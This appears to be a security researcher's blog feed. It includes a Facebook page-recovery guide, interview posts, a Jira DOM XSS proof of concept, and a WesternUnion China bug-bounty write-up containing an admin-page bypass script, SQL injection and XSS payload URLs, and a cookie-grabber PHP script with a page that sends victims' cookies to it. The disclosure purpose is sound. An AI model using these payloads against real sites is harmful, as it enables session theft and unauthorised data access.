tag:blogger.com,1999:blog-67658045924608179102024-03-13T13:16:36.784+02:00Răzvan Cernăianu"If you can see the invisible, you can do the impossible..."TinKodehttp://www.blogger.com/profile/17308349926112189646noreply@blogger.comBlogger17125tag:blogger.com,1999:blog-6765804592460817910.post-10394755757220100342020-05-24T22:10:00.061+03:002023-12-06T09:19:54.305+02:00How to recover your Hacked Facebook Page<div class="separator"><div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><div style="text-align: justify;">It's been a long time but I'm back now. In recent years, I got so many requests from people who wanted to <b>recover their hacked Facebook pages</b>. The main problem is there are too many incidents of this type (<i>maybe millions per month</i>), so the response time until someone from the Facebook staff replies can be long. After all, I decided to write a tutorial about how to do that <b>in less than 48-72 hours</b>.</div></div></div><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;">Important to mention is that if you don't have the Facebook page verified with <b>Blue Badge</b>, it is very hard to prove who is the real <b>Page Owner</b> because it can be administrated by <b>any</b> valid Facebook <b>profile</b> (<i>this is the reason that doesn't exist the feature to recover a Facebook page</i>).</div><br /><span><a name='more'></a></span></div><div style="text-align: center;"><h3 style="text-align: left;">The story</h3></div><div style="text-align: justify;">A short time ago, my friend <b><a href="https://www.facebook.com/DjAsherOfficial/" rel="nofollow" target="_blank">DJ Asher</a></b> observed that he is no longer the Page Owner of his page and another suspicious Facebook profile has this role; maybe the attacker didn't want to expose his access yet. My first advice for him was to report the problem via the <a href="https://www.facebook.com/hacked" rel="nofollow" target="_blank"><b>Facebook Hacked</b></a> contact form (available option: <i>Someone else got into my account without my permission</i>). Sadly as I said before, nobody responds quickly.</div><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;">The next step was to figure out a situation where a company like Facebook<b> would respond to a complaint in less than 72 hours</b> and at the same time, it must be related to our main request. <b>The impossible becomes possible</b>! Why? Because once a Facebook page has been stolen and you're no longer the Page Owner, it can be easily framed as an infringement of the <b>Copyright</b> / <b>Trademark</b>, as the attacker uses the content/identity of your business.</div><br /></div><div style="text-align: center;"><h3 style="text-align: left;">The steps</h3></div><div style="text-align: center;"><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="415" src="https://www.youtube.com/embed/tUCsGYojuBE" width="100%"></iframe></div><div><b><br /></b></div><div>After applying, verify your email and <b><a href="https://www.facebook.com/support" rel="nofollow" target="_blank">Facebook Support</a>.<br /></b></div><div><b><br /></b></div><div style="text-align: justify;"><b>Note</b>:<b> </b>You must have some pictures/videos/posts that can be visible on your other social media accounts (<b>written on</b>:<i> Where can we see an authorized example of your work?</i>). You can attach some screenshots with your accounts (logged in) to show that you're not an impostor.</div><div style="text-align: center;"><br /><h3 style="text-align: left;">After</h3></div><div>You'll receive an email from <b>Facebook Legal Department</b> with:<br /></div><div><br /></div><div style="text-align: left;"><pre> Hi,<br /><br />It looks like your copyright report concerns an entire Page, group, or profile that contains many individual photos, posts and other pieces of content. <br />It’s unclear to us that you own the copyright in all these various items, or that all these various items would be infringing your copyrighted works.<br /><br />So that we can better understand your report, please provide the following:<br /><br />- A link (URL) to an authorized example of your copyrighted work or a detailed description of each copyrighted work that you allege is being infringed.<br />- A link (URL) to the post, photo or other item(s) you’re reporting, which can be found by clicking either directly on the content or on the time and date that appears in gray with the content (ex: "8 hours ago"). <br />If a link isn't available, provide a detailed description of where it appears on Facebook, including the name of the person who posted it and the time they posted it.<br />- An explanation of how you believe the content you’ve reported infringes your rights.<br /><br />If you believe some legal right other than copyright has been violated, such as trademark rights, please identify that right and include your basis for asserting it.<br />Once we’ve received this additional information, we’ll be happy to look into the matter further.<br /><br />Thanks,<br />Facebook</pre></div><div><br /></div><div>You can answer with:</div><div><br /></div><div style="text-align: left;"><pre>Hello,<br /><br />Almost all photos & videos on the page that I reported (my page that was hacked) can be found on my other social media profiles. <br />After <span style="color: #b30000;"><b>insert_date</b></span> I wasn't able to find anymore my facebook page in "<b>Your Pages</b>" section. <br />Until now, the page seems to be [<span style="color: #b30000;"><b>un</b></span>]touched by the hacker and all my posts and the about section are [<span style="color: #b30000;"><b>un</b></span>]changed. <br /><br />That's the list with my accounts that are linked with my hacked facebook page and there you can find my music, videos and photos:<br /><br />- <b>Facebook Page</b>: https://www.facebook.com/<span style="color: #b30000;"><b>your_account</b></span><br />- <b>Instagram</b>: https://www.instagram.com/<span style="color: #b30000;"><b>your_account</b></span><br />- <b>Spotify</b>: https://open.spotify.com/artist/<span style="color: #b30000;"><b>your_account</b></span><br />- <b>Soundcloud</b>: https://soundcloud.com/<span style="color: #b30000;"><b>your_account</b></span><br />- <b>Youtube</b>: https://www.youtube.com/user/<span style="color: #b30000;"><b>your_account</b></span><br />- <b>Twitter</b>: https://twitter.com/<span style="color: #b30000;"><b>your_account</b></span><br />- <b>Blog</b>: https://www.<span style="color: #b30000;"><b>your_blog</b></span>.tld/<br />etc...<br /><br />After I saw in "<b>Security and Login/Where You're Logged In</b>" of my facebook account an unauthorized device from <span style="color: #b30000;"><b>Country</b></span>/<span style="color: #b30000;"><b>City</b></span> I reseted my password and logged out of all the sessions from that moment.<br />Let me know if you need anything else from me in order to solve this problem and to be able to own my Facebook page again.<br /><br />All the best,<br /><span style="color: #b30000;"><b>your_name</b></span></pre></div><div><br /></div><div>They'll be asking if you want to remove the page or <b>restore</b> it to the <b>old account </b>that was <b>Page Owner</b>:</div><div><br /></div><div style="text-align: left;"><pre> Hi,<br /><br />Thanks for contacting us. Based on the information provided, it is unclear whether you're making an intellectual property claim or requesting an admin change for a Page or group.<br />Please note that intellectual property claims can result in the permanent removal of the content you're reporting from Facebook. <br /><b>We can't change the admins of a Page or group based on an intellectual property claim</b>.<br /><span style="color: #b30000;"><b>If you're requesting an admin change for a Page or group, a different team at Facebook might be able to help you with that issue. <br />If you'd like us to forward your request to that team, please reply to this message with the following information:</b></span><br /><br />* A link to the Facebook profile of the person requesting an <b><span style="color: #b30000;">admin change</span> for a Page or group</b>. <br />If you're submitting this request on behalf of someone else, please provide a link to their profile, <span style="color: #b30000;"><b>and the team will follow up with them directly</b></span>.<br /><br />* A link to the Facebook Page or group you're requesting an admin change for[...]<br />If instead you'd like to continue with your intellectual property claim, understanding that the reported content may be removed from Facebook, please respond to this message confirming this and we will look into the matter further.<br /><br />Thanks,<br />Facebook</pre></div><div><br /></div><div>Reply with [<span style="color: #b30000;"><b>demo</b></span>]:</div><div><br /></div><div style="text-align: left;"><pre>Hi,<br /><br />Until now, I've reached almost 15k fans and I don't want to remove the page because I want to use it again. <br /><br />Request for the admin change:<br /><br />- Facebook profile requesting admin change, myself: https://www.facebook.com/<span style="color: #b30000;"><b>your_facebook_profile</b></span><br />- Facebook Page requesting an admin change for, my Artist Page that got hacked: https://www.facebook.com/<b><span style="color: #b30000;">your_hacked_facebook_page</span></b>/<br /><br />Let me know what else do you need, to get my Facebook Page back.<br /><br />All the best,<br /><span style="color: #b30000;"><b>your_name</b></span><br /><br /></pre></div><div>Now you can check <b>Your Pages</b> in your <b>Facebook profile account</b>. Mission accomplished.<br /><br /></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"></div><div><b>Thanks</b>,</div><div>Razvan Cernaianu (<b>TinKode</b>).</div>Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-6765804592460817910.post-81506043863999997442017-04-07T18:11:00.068+03:002023-12-08T14:01:53.615+02:00The Other Side Of Hacking<div style="text-align: left;">A short documentary following four people in the world of Romanian cyber security, each serving a different role and purpose. The full movie will be presented on <b>26-04-2017</b> at <a href="http://beverlyhillsfilmfestival.com/2017-official-selection-wed/" target="_blank"><b>Beverly Hills Film Festival</b></a>.</div><span><a name='more'></a></span><div style="text-align: left;"><br /></div><div style="text-align: left;"><h3 style="text-align: left;"> TRAILER</h3></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="400" src="https://www.youtube.com/embed/y64ojesNHs4" width="100%" youtube-src-id="y64ojesNHs4"></iframe></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6765804592460817910.post-63257456903905045332016-05-09T13:39:00.045+03:002023-12-06T13:44:18.236+02:00Interview | NBC News USA<div class="separator"></div>
<div><div style="text-align: justify;">In a recent meeting with Ms. Cynthia McFadden, who was in Romania for an interview, we delved into my past, addressing an increasingly concerning theme in the digital world - 'ransomware.' Jointly with Mr. Madalin Dumitru, we discussed this pressing issue in an interview for NBC. I encourage you to watch our discussion to gain insights into the escalating cyber threats.</div></div><div><br /></div><div><br /></div><div><br /></div><span><a name='more'></a></span><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="500" src="https://www.youtube.com/embed/qz6LrYKuUJY" width="100%" youtube-src-id="qz6LrYKuUJY"></iframe></div><div><br /></div><div><b></b><blockquote><b>On assignment</b> in Romania, Cynthia McFadden caught up with another world-known hacker nicknamed “<b>TinKode</b>”. He’s in a new line of work, and along with cybersecurity expert Madalin Dumitru, he warns of a growing cyber threat known as “ransomware.”</blockquote><br />You can see the full report on Sunday, May 8 on <b>NBC News</b> - On Assignment: Growing Threat "Ransomware".</div>
Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-6765804592460817910.post-69323458888925781942016-01-27T04:29:00.020+02:002023-12-06T14:00:33.983+02:00Atlassian Jira | DOM XSS Vulnerability | UnauthenticatedAtlassian Jira is a widely-used project management platform, offering robust tools for tracking, managing, and collaborating on various projects. Its features, including issue tracking and customizable workflows, make it a staple in software development and project management. <br /><br /><div><b>DOM XSS</b> (Cross-Site Scripting) is a medium-critical vulnerability specific to web applications. This attack allows malicious scripts to be injected directly into a web page's Document Object Model (DOM), putting users at risk. Prompt identification and remediation of this vulnerability are essential to safeguarding a web application's integrity and security.<br /></div><span><a name='more'></a></span><div><h3 style="text-align: left;"><br />Proof of Concept</h3>
<img alt="Tesla Motors | BugBounty" src="https://4.bp.blogspot.com/-oSbrMawNP3Y/Vqgh2upyQvI/AAAAAAAAAZA/pVKWuAL4KaE/s16000/domxss-teslamotors.gif" title="Tesla Motors | BugBounty" />
</div><div><br /></div>
<pre style="background: none 0% 0% repeat scroll rgb(249, 249, 249); color: #080808; text-align: left;"><span style="color: #5a525f; font-style: italic;"># Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS</span>
<span style="color: #5a525f; font-style: italic;"># Date : 27.01.2016</span>
<span style="color: #5a525f; font-style: italic;"># Author: Razvan Cernaianu</span>
<span style="color: #5a525f; font-style: italic;"># Vendor Homepage: https://www.atlassian.com</span>
<span style="color: #5a525f; font-style: italic;"># Version: 6.0.* <= 6.1.4</span>
<span style="color: #5a525f; font-style: italic;"># Blog: www.TinKode.com</span>
</pre>
<h3 style="text-align: left;"><br />Vulnerable code </h3>
<pre style="background: none 0% 0% repeat scroll rgb(249, 249, 249); color: #080808; text-align: left;"># Vulnerable Parameter<span style="color: #794938;">:</span> $window.<span style="color: #693a17;">name</span>
<div class<span style="color: #794938;">=</span><span style="color: #0b6125;">"aui-page-header-main"</span>>
<h1>${<span style="color: #693a17;">name</span>}<<span style="color: #794938;">/</span>h1>
<<span style="color: #794938;">/</span>div> </pre>
<h3 style="text-align: left;"><br />Exploit
</h3>
<pre style="background: none 0% 0% repeat scroll rgb(249, 249, 249); color: #080808; text-align: left;"><<span style="color: #bf4f24;">html</span>>
<<span style="color: #bf4f24;">script</span>>
<span style="color: #a71d5d; font-style: italic;">var</span> victim<span style="color: #794938;">=</span> <span style="color: #691c97;">window</span>.<span style="color: #693a17;">open</span>(<span style="color: #0b6125;">'https://victim/secure/Dashboard.jspa'</span>, <span style="color: #0b6125;">'<script>alert(document.cookie);<<span style="color: dimgrey; font-weight: 700;">\/</span>script>'</span>);
</<span style="color: #bf4f24;">script</span>>
</<span style="color: #bf4f24;">html</span>>
</pre>
Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-6765804592460817910.post-26976017089798200902016-01-07T01:16:00.046+02:002023-12-08T12:06:36.095+02:00The most notorious hackers in internet historyI strongly believe that "Top 10 the most..." lists in hacking are unreliable. Non-industry experts typically create these rankings and rely on speculations. Journalists amplify these rankings but often lack a full understanding of the subject, leading to exaggerated importance assigned to certain persons. This can be extremely misleading, particularly for those unfamiliar with the intricacies of hacking.<span><br /><a name='more'></a></span>
<b style="font-size: medium;"></b><p> </p><blockquote><b style="font-size: medium;">TOP 10 ARCHIVE</b>: "In today’s day and age the internet can become a battleground for cyber wars. Hackers have been known to take down crucial websites, steal credit card information, take down gaming servers, and even use their expertise to assist government agencies. In the cyber world, some of these hackers have gained quite a bit of fame for their computer expertise, becoming some of the most notorious hackers in internet history."</blockquote><br /><h3>TOP 10</h3>
<pre style="background: none 0% 0% repeat scroll rgb(249, 249, 249); color: #333333;"><span style="color: #333333;">10. Lizard Squad
9. Johnathan James
8. Syrian Electronic Army
7. Gary McKinnon
6. Jeanson Anchet
5. Kevin Mitnick
4. Kristina Svechinskaya
3.
2.
1.
</span></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3 style="text-align: left;">VIDEO</h3><div style="text-align: center;"><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/P8GNpitBFI4" width="100%"></iframe></div>Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-6765804592460817910.post-49006762546615082812015-09-25T22:24:00.018+03:002023-12-08T12:28:00.899+02:00Auditing United Airlines | Bug Bounty Program<div style="text-align: justify;">
A few months ago, <a href="https://www.united.com/" rel="nofollow" target="_blank">United Airlines</a> launched a Bug Bounty program with a slightly different twist compared to the usual ones. Instead of rewarding participants with a sum of money, they opted to offer miles that can be used for flights or other perks such as car rentals, hotel stays, or merchandise with both their airline and those within the Star Alliance. Rewards range from 50,000 to 250,000 up to 1,000,000 miles, operating essentially as loyalty points. For instance, a flight from Bucharest to Dublin costs around 30,000 miles.</div>
<span>
<a name='more'></a>
</span>
<br /><div style="text-align: justify;">A few days after the program's launch, I began searching for vulnerabilities in <b>*.united.com</b> (I believe that was how it started—later they narrowed it down to only a few subdomains, but they specified in the TOS that they could change the rules as they pleased, so no comments there). </div><br /><div style="text-align: justify;">After two months of waiting and discovering 29 vulnerabilities, I received my first response: a reward of 50,000 miles within the <a href="https://www.united.com/en/us/fly/mileageplus.html" rel="nofollow" target="_blank">MilesAge</a> program. There are still three pending vulnerabilities (they were acknowledged but not yet fixed). I suspect they will also be rewarded with 50,000 each, resulting in a total of 200,000 miles. Considering the testing lasted only two days, I can say I'm satisfied.</div><div><br /></div>
<h3>THE BOUNTY</h3>
<div><img src="https://3.bp.blogspot.com/-szmPlP5CaRo/VgWQPYEZl9I/AAAAAAAAASg/AhIWj1tSwto/d/united%2Bairlines%2Bbounty.png" /></div>
<br />Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-6765804592460817910.post-25625625252288427492015-06-17T23:59:00.018+03:002023-12-08T13:58:08.897+02:00The Most Dangerous Town | On the Internet"<b>IN SEARCH OF THE MOST DANGEROUS TOWN ON THE INTERNET</b>" is a documentary
film that dives deep into the <a href="https://1.bp.blogspot.com/-bPT5bueSNTc/XrTwg92wuGI/AAAAAAAAAs8/Xp2E23qswaYdPsjGbVmqNyXTBs3Uoe2NwCK4BGAsYHg/ezgif.com-gif-maker.png" rel="nofollow" target="_blank">secret</a> world of hacking. It is a bold and
artful look at the places and people that are fighting for and against
the advancement of cybercrime. <br />
<span style="font-weight: bold;">
<a name='more'></a>
</span>
<div style="text-align: left;"><br /></div><div style="text-align: left;">
Watch the documentary profiling the Romanian town nicknamed "Hackerville" or "Most Dangerous Town on the Internet":</div><div style="text-align: left;">
<div style="font-weight: bold; text-align: center;"><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/un_XI4MM6QI" width="100%"></iframe></div></div>Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-6765804592460817910.post-75656879412335566552015-05-16T09:43:00.090+03:002023-12-08T15:19:09.987+02:00Auditing WesternUnion China | Bug Bounty Program<div><img border="0" data-original-height="2160" data-original-width="3840" src="https://1.bp.blogspot.com/-Tv3DwX9Vum8/Xt1BQbsGThI/AAAAAAAABQY/p3k-ibXMSHA6KJtRexyfXYIp-mRM8nRfgCK4BGAsYHg/d/WesternUnion-Poster.jpg" style="margin-left: auto; margin-right: auto;" /><br /><br /><a name='more'></a><div style="text-align: center;"><h3 style="text-align: center;"><b>🔻</b>INTRODUCTION<b>🔻</b></h3></div><div><br />Acum vreo 3 săptămâni am început serios să caut vulnerabilități în WesternUnion după ce am văzut că s-au înscris într-un program de bug bounty. Pentru necunoscători, semnificația unui program de bug bounty este aceea de: găsește o vulnerabilitate în sistemele noastre și noi te răsplătim cu o sumă de bani în funcție de impactul ei. Până acum sună frumos, dar există o mulțime de dezavantaje în comparație cu avantajele oferite.<br />
<br />
Avantajul ar fi că în loc de o echipă de pentesteri limitată din punct de vedere numeric poți avea auditate serverele de sute de mii de oameni care lucrează în domeniu sau care sunt freelanceri. Unul din marele dezavantaje ar fi că dai acordul tuturor potențialilor atacatori rau intenționați să umble nestingheriți prin lucrurile tale, ei putând foarte ușor să vândă (neputând fi acuzați de acces neautorizat) ceea ce găsesc pe piața neagră. Dar să nu ne abatem prea mult de la subiect.<br />
<br />
Din lista de domenii valide pentru acest program am ales să caut vulnerabilități în WesternUnion China (www.WesternUnion.cn). După o scurtă perioadă de timp am găsit câteva vulnerabilități ce s-au dovedit a fi duplicate (raportate de alții). Dar asta nu m-a descurajat să caut în continuare.<br />
<br />
După câteva ore de auditare, am găsit următoarele:<br />
<ul>
<li>Restricted files bypass</li>
<li>MySQL Injection</li>
<li>Arbitrary File Download</li>
<li>Cross-Site Scripting</li>
<li><a href="#info_expo">Information Exposure</a></li>
<li>Multiple Session Vulnerabilities</li>
</ul>
Voi detalia în ordine cronologică vulnerabilitățiile identificate.</div><div><br /></div><div style="text-align: center;"><h3>🔻VIDEO | Proof Of Concept🔻</h3></div><div><br /></div><div style="text-align: center;"><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="415" src="https://www.youtube.com/embed/554TPc8c3Rs" width="1060"></iframe></div><div><br />
</div><h3 style="text-align: center;">
<b>🔻<a href="#" id="info_expo" name="info_expo">Information Exposure</a>🔻<u><br /> </u></b></h3>
<div style="display: inline; margin: 0px 0px 2px; vertical-align: text-bottom;">
<br />În urma unei scanări (bruteforce) de fișiere și directoare pe domeniul www.WesternUnion.cn am găsit un fișier interesant numit: awstats.pl. Pentru ce este folosit acest fișier mai exact? AWstats este un tool de analiză a log-urilor web (mai multe citiți <a href="http://en.wikipedia.org/wiki/AWStats" target="_blank">aici</a>). Cu ajutorul acestei "vulnerabilități" am obținut calea folder-ului <b>wu_admin</b> și fișierele:</div>
<br /><div>
<pre style="text-align: left;">http://westernunion.cn/wu_admin/login.php <br />http://westernunion.cn/wu_admin/import.php <br />http://westernunion.cn/wu_admin/edit.php <br />http://westernunion.cn/wu_admin/view.php <br />http://westernunion.cn/wu_admin/export.php <br />http://westernunion.cn/wu_admin/search.php</pre><br /><h3 style="text-align: center;"><b>🔻Restricted files bypass🔻</b></h3><br />Până acum nu am obținut nimic critic, dar în urma analizării HTTP Response-ului (http://westernunion.cn/wu_admin/view.php) am observat ceva ce nu părea în regulă:<br /><div>
<br />
<b>HTTP Request</b><div><pre style="text-align: left;">GET /wu_admin/view.php HTTP/1.1
Host: westernunion.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fqgk2t3o85sumlu0vdlfdnr961
Connection: keep-alive</pre></div><br />
<b>HTTP Response </b><div><pre style="text-align: left;">HTTP/1.1 302 Found<br />Date: Mon, 20 Apr 2015 00:01:32 GMT<br />Server: Apache<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Pragma: no-cache<br />Location: login.php<br />Content-Length: 6148<br />Connection: close<br />Content-Type: text/html; charset=utf-8</pre></div><br />
Din acest HTTP Response putem afla că fișierul view.php există (HTTP/1.1 302 Found), după care suntem redirecționați către login.php (Location: login.php). Dar ceva lipsește din tag-ul Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 și anume <b>max-age=^value^</b>. Și dacă lipsește, ce se întâmplă? Păi <span id="result_box" lang="ro"><span class="hps">opțiunea</span> <span class="hps atn">"</span><span class="atn">max-</span>age" indică <span class="hps">cât</span> <span class="hps">de mult</span> <span class="hps">un response</span> <span class="hps">poate</span> <span class="hps">fi</span> <span class="hps">cache</span><span>d, deci din asta reiese că o sesiune validă nu va expira vreodată. Pentru a evita această problemă trebuie setat max-age=0.</span></span><br />
<span id="result_box" lang="ro"><span><br /></span></span>
<span id="result_box" lang="ro"><span>Știm că un browser modern (Chrome / Mozilla / Safari / chiar și IE, etc) tinde să nu bage în seamă header-ul "Expires", dar dacă folosim cURL pentru a împiedica redirect-ul?</span></span><br />
<br />
<b> WU-PoC.sh </b><br /></div><pre style="text-align: left;">#!/bin/bash
# Name: Bypass - Restricted files
# URL : WesternUnion.cn - Proof of Concept
#
# +-------------------------------------+
# | root@PwN:~# nc westernunion.cn 80 |
# | GET /wu_admin/FILE.EXT HTTP/1.1 |
# | Host: westernunion.cn |
# | Accept-Encoding: gzip, deflate |
# +-------------------------------------+
#
# Found by Razvan Cernaianu a.k.a TinKode @ www.CyberSmartDefence.com
curl "http://westernunion.cn/wu_admin/$1" 2>/dev/null > $2</pre><div><br /></div><div>
It works! Acum putem accesa pagina view.php fără a fi autentificați.<br />
<br />
</div><div><h3 style="text-align: center;"><b>🔻Arbitrary File Download🔻</b></h3><br />Cu ajutorul vulnerabilității de mai sus am putut să obțin toți parametrii din filele aferente. Așadar am văzut că fila export.php are parametrul table ce ne permite să descărcăm anumite informații dintr-un tabel din baza de date principală (de exemplu: tabelul cn) în format xls. Lista era predefinită pentru fiecare agent WesternUnion, dar dacă se poate mai mult? </div><div>
<b><br /> URL Request </b><br /></div><pre style="text-align: left;">http://www.westernunion.cn/wu_admin/export.php?table=information_schema.tables--+--
</pre><div><br /></div><div><b>HTTP Response </b><br /></div><pre style="text-align: left;">HTTP/1.1 302 Found
...
Expires: Thu, 19 Nov 1981 08:52:00 GMT
...
Content-Disposition: attachment;filename="20150420215741_information_schema.tables--+--.xls"
...
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet </pre><br />Cu această vulnerabilitate am putut să descarc tabelul admin_manager unde erau toți administratorii Western Union China.<div class="separator" style="clear: both; text-align: center;"><br /></div><div style="text-align: left;"><h3 style="text-align: center;">
<b>🔻MySQL Injection🔻</b></h3>
</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Următoarea filă pe listă a fost edit.php cu parametrii id, page,table. Parametrul id & table erau vulnerabili la MySQL Injection. Exploatarea fiind realizată neautentificat.<br /></div><div>
<br />
<b>URL</b></div><div><pre style="text-align: left;">http://www.westernunion.cn/wu_admin/edit.php?id=1[SQLi]&page=0&table=cn[SQLi]
</pre></div><br /><div style="text-align: left;"><h3 style="text-align: center;">
<b>🔻Cross-Site Scripting🔻</b></h3>
</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Dacă nu găseam și niște XSS-uri ca să fur câteva cookie-uri, parcă nu mă simțeam complet :)). <br /></div><div>
<br />
<b>URL</b><br />
<pre style="text-align: left;">http://westernunion.cn/wu_admin/view.php?page=5&view=1&table=kr[XSS]
http://westernunion.cn/wu_admin/search_show.php
POST: selected_table=kr[XSS]&page=&agent_id=1&location_id=&phone_countrycode=
&phone_areacode=&phone=&phone2=&fax=&postal_code=&province_kr=&province_en=&city_kr=
&city_en=&address_kr=&address_en=&agent_kr=&agent_en=&location_kr=&location_en=</pre>
</div><div><br />
<br />
Mi-a fost cerut un Proof of Concept pentru a arăta cum pot fura cookie-urile administratorilor. Așa că am făcut un simplu cookie grabber.<br />
<br />
<b>grab.php</b><br /><pre style="text-align: left;"><?php
$cookie = $_GET['c'];
$fp = fopen('log.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br><br>');
fclose($fp);
?></pre><b><br />steal.html</b></div><pre style="text-align: left;"><html>
<body>
<center>
<iframe width="100" height="0" src="http://westernunion.cn/wu_admin/view.php?page=5&view=1&table=<script>document.location='http://127.0.0.1/xss_poc/grab.php?c='%2bdocument.cookie;</script>" />
</center>
</body>
</html> </pre><br /><div><h3 style="text-align: center;">
<b>🔻Multiple Session Vulnerabilities🔻</b></h3><br /></div><div><ul><li>Session Fixation</li>
<li>Sesiunea nu este reînnoită automat</li>
<li>Sesiunea nu este distrusă atunci când un administrator se deconectează din contul său.</li>
</ul>
<br />
Session Fixation: Este un atac care permite unui atacator să seteze victimei sesiunea pe care acesta o dorește. Acest scenariu este realizabil doar cu ajutorul (altei vulnerabilități) unui XSS spre exemplu. Mai multe puteți citi <a href="https://www.owasp.org/index.php/Session_fixation" target="_blank">aici</a>.<br />
<br />
Sesiunea nu este reînnoită automat: Asta înseamnă că un administrator va avea aceași sesiune înainte și după logare. Dacă un atacator obține orice tip de sesiune (validă/invalidă) prin orice mijloace, el ar putea să se autentifice. De ce am specificat și "o sesiune invalidă"? Deoarece acea sesiune invalidă va deveni la un moment dat validă (când administratorul se autentifică). Atacatorul poate crea un cronjob să dea refresh la pagină din oră în oră pentru a verifica dacă este logat.<br />
<br />
Sesiunea nu este distrusă atunci când un administrator se deconectează din contul său permitând unui atacator să facă bruteforce după o sesiune validă (șansele fiind foarte mari deoarece pot exista mii se sesiuni valide).<br />
<br />
</div><div><h3 style="text-align: center;">
🔻Concluzia🔻 </h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img.gawkerassets.com/img/17gujsapvqnnyjpg/original.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="150" src="http://img.gawkerassets.com/img/17gujsapvqnnyjpg/original.jpg" width="200" /></a></div>
</div><div><br /></div><div>Este una simplă având în vedere că pentru toate acestea am primit doar $2,600.<br />
<ul>
<li>MySQL Injection (Impact - Critic): $1.000</li>
<li>Arbitrary File Download (Impact - Critic): $1.000</li>
<li>Information Exposure (Impact - Mic-Mediu): $200</li>
<li>2 XSS (Impact - Ridicat): $400</li>
<li>Multiple Session Vulnerabilities (Impact - Mediu): $0</li>
<li>Restricted Files Bypass (Impact - Critic): $0 deoarece este duplicată (răspunsul lor: intră laolaltă cu restul de vulnerabilități raportate) - SERIOS? </li>
</ul>
<br />
Am uitat să menționez că sumele plătite în programul lor pentru bug-urile valide sunt cuprinse între $100 - $5,000. Eu chiar am rămas stupefiat când am văzut asta. Curiozitatea mea cea mai mare rămâne: pentru ce tip de vulnerabilități și ce impact să aibe, plătesc $2,000, $3000, $4000, $5000.<br />
<br />
Pe scurt puteți nota și acest dezavantaj în lista voastră dacă participați la un astfel de program. Acestea fiind spuse, ei au obținut un audit complet a domeniului www.WesternUnion.cn (13 vulnerabilități raportate) iar eu am obținut $2,600 și locul 1 în topul lor world wide (<a href="https://bugcrowd.com/westernunion/hall-of-fame" target="_blank">Hall of Fame</a>). Foarte echitabil, nu!?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<div class="separator" style="clear: both; text-align: center;"><img border="0" data-original-height="698" data-original-width="1508" height="296" src="https://1.bp.blogspot.com/-O2urEa28O90/XryQWBK2U4I/AAAAAAAAAwQ/yNXL2vqQ8PMWMT-gdA3_cOCb2D9bjBy2QCK4BGAsYHg/w640-h296/Screenshot%2B2020-05-14%2Bat%2B03.26.35.png" width="640" /></div></div><br /></div></div></div>Unknownnoreply@blogger.com22tag:blogger.com,1999:blog-6765804592460817910.post-84273291567438454092014-10-11T00:36:00.011+03:002023-12-08T15:20:11.250+02:00Interview | M6 France | About Hackers<img height="auto" src="https://1.bp.blogspot.com/-9bOalUFC1Jc/XrT7gbJr-DI/AAAAAAAAAtc/pSrVMJrUsP4bCbrar5P0gN0kGvtyYQvuwCK4BGAsYHg/d/Screenshot%2B2020-05-08%2Bat%2B09.25.19.png" width="auto" />
<span>
<a name='more'></a>
</span><div style="text-align: left;"><h3 style="text-align: center;">ABOUT</h3></div><ul style="text-align: left;"><li>Television Channel: M6 France</li><li>The name of show : Zone Interdite</li><li>Title: <span class="tlid-translation translation" lang="en"><span title="">Privacy in jeopardy / Why we are all concerned</span></span></li></ul><h3 style="text-align: center;">
VIDEO</h3><div>You can watch the interview (skip to 01:19:00 to see me):</div>
<div style="text-align: center;"><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/hd4lJZZ_Y30" width="100%"></iframe></div>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-6765804592460817910.post-90046462264584777692014-06-11T14:47:00.010+03:002023-12-08T15:22:03.670+02:00Safely double your money with PayPal | Loophole<center><img height="385" src="http://2.bp.blogspot.com/-7z9Rs4r9I5Y/U4m0sf8AGhI/AAAAAAAAANE/YURLFKMizQ8/w640-h385/paypal---double-your-money.png" width="640" /></center>
<span>
<a name='more'></a>
